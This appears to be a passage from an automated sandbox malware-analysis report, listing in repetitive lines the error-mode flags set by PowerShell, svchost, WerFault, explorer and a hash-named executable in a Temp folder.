                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
